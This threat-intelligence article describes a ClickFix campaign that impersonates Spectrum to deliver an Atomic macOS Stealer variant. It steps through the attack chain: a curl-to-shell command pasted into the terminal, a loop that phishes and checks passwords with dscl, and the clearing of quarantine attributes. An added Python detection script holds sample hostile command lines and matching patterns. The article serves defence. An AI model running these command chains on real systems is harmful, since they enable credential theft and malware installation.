Atomic Stealer Variant Targets macOS Users via ClickFix
A campaign leveraging the ClickFix technique has been observed distributing a variant of the Atomic macOS Stealer (AMOS), with CloudSEK attributing the operation to Russian-speaking cybercriminals. The campaign impersonates Spectrum, a U.S. telecommunications provider, using domains like panel-spectrum[.]net and spectrum-ticket[.]net to trick users into believing they are interacting with the official Spectrum platform. These domains act as delivery mechanisms for the malicious payloads, targeting macOS users through fake verification flows. The delivery infrastructure contained Russian-language comments in the source code, which, along with other behavioral indicators, led CloudSEK to assess a high likelihood of involvement from Russian-speaking threat actors. This aligns with a broader trend of AMOS variants being utilized in social engineering campaigns tailored to platform-specific delivery methods.
The infection process begins with the now-familiar prompt to complete a CAPTCHA verification, which, instead of a standard check, instructs the user to copy a command and execute it in a terminal. The page checks the browser's user-agent to determine the victim's platform: Windows workstations receive a PowerShell command that downloads the payload with "Invoke-WebRequest", while macOS users receive a Bash command that uses curl to silently retrieve a shell script responsible for credential harvesting and staging of a second-stage payload. Once executed, the downloaded "install.sh" script retrieves the active user context with "whoami", so that the password prompt matches the logged-in user. The script then enters a loop prompting for system credentials and verifying each attempt in real time against macOS directory services with the "dscl . -authonly" command.
Once the correct password is acquired, the script silently downloads an additional binary, strips its extended file attributes (the protections macOS applies to downloaded files) with "sudo -S xattr -c", and marks it executable with "chmod +x" before launching it. This binary, according to CloudSEK, is a variant of AMOS. CloudSEK's analysis revealed operational errors in the campaign's infrastructure, such as mismatched instructions across different operating systems and incorrect command prompts for Linux users. Despite this sloppiness, the campaign remains effective against macOS users thanks to its tailored infection path.
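As an added example (not code from CloudSEK's report or the campaign itself), the following shows how a defender could hunt for the chain described above in macOS process-execution telemetry: events are grouped under the shell that ran the curl-fetched script, each stage of the chain is matched against the command line, and repeated "dscl . -authonly" attempts (the password loop) combined with "xattr -c" and "chmod +x" are treated as the strongest signal. The event schema and the sample events are constructed assumptions, not a real EDR export.

```python
import re
from collections import defaultdict

# Constructed macOS process-execution events (field names are an assumption, not a real
# EDR schema). pid 501 is the shell running the curl-fetched script; its children have ppid 501.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 501, "ppid": 400, "cmd": 'bash -c "$(curl -fsSL https://example.invalid/install.sh)"'},
    {"ts": 101, "pid": 502, "ppid": 501, "cmd": "whoami"},
    {"ts": 102, "pid": 503, "ppid": 501, "cmd": "dscl . -authonly alice guess1"},
    {"ts": 103, "pid": 504, "ppid": 501, "cmd": "dscl . -authonly alice guess2"},
    {"ts": 104, "pid": 505, "ppid": 501, "cmd": "dscl . -authonly alice correct"},
    {"ts": 106, "pid": 507, "ppid": 501, "cmd": "sudo -S xattr -c /tmp/.update"},
    {"ts": 107, "pid": 508, "ppid": 501, "cmd": "chmod +x /tmp/.update"},
    {"ts": 200, "pid": 600, "ppid": 1, "cmd": "xattr -c /Users/alice/Downloads/notes.txt"},  # lone benign use
]

CURL_RX = re.compile(r"\bcurl\b")
# A shell at the start of the command line, after a pipe/separator, or inside $( ).
SHELL_RX = re.compile(r"(?:^|[|;&]\s*|\$\(\s*)(?:bash|zsh|sh)\b")
STAGES = {  # stage of the chain described above -> predicate on one command line
    "remote_script_to_shell": lambda c: bool(CURL_RX.search(c) and SHELL_RX.search(c)),
    "whoami": lambda c: c.strip().startswith("whoami"),
    "dscl_authonly": lambda c: re.search(r"\bdscl\s+\.\s+-authonly\b", c) is not None,
    "xattr_clear": lambda c: re.search(r"\bxattr\s+-c\b", c) is not None,
    "chmod_exec": lambda c: re.search(r"\bchmod\s+\+x\b", c) is not None,
}

def score_chain(events, window=600):
    """Return {shell_pid: {"stages": set, "authonly_attempts": int, "verdict": str}}."""
    groups = defaultdict(list)
    for e in events:  # the curl-to-shell event anchors a group under its own pid; children join by ppid
        key = e["pid"] if STAGES["remote_script_to_shell"](e["cmd"]) else e["ppid"]
        groups[key].append(e)
    results = {}
    for key, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        start, stages, attempts = evs[0]["ts"], set(), 0
        for e in evs:
            if e["ts"] - start > window:  # only correlate events close in time
                break
            for name, match in STAGES.items():
                if match(e["cmd"]):
                    stages.add(name)
                    attempts += int(name == "dscl_authonly")
        # Repeated -authonly checks (the password loop) plus xattr -c and chmod +x is the full pattern.
        full = attempts >= 2 and {"xattr_clear", "chmod_exec"} <= stages
        verdict = "clickfix_amos_chain" if full else "suspicious" if len(stages) >= 3 else "benign"
        results[key] = {"stages": stages, "authonly_attempts": attempts, "verdict": verdict}
    return results
```

A single "xattr -c" on a downloaded document, as in the last sample event, stays benign; only the correlated sequence under one parent shell raises the verdict.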
The theft of user credentials can provide access to sensitive internal resources, increase the risk of lateral movement within organizations, and facilitate further exploitation or resale in underground markets. CloudSEK warns that such multi-platform phishing campaigns represent a growing threat to consumers and enterprises alike.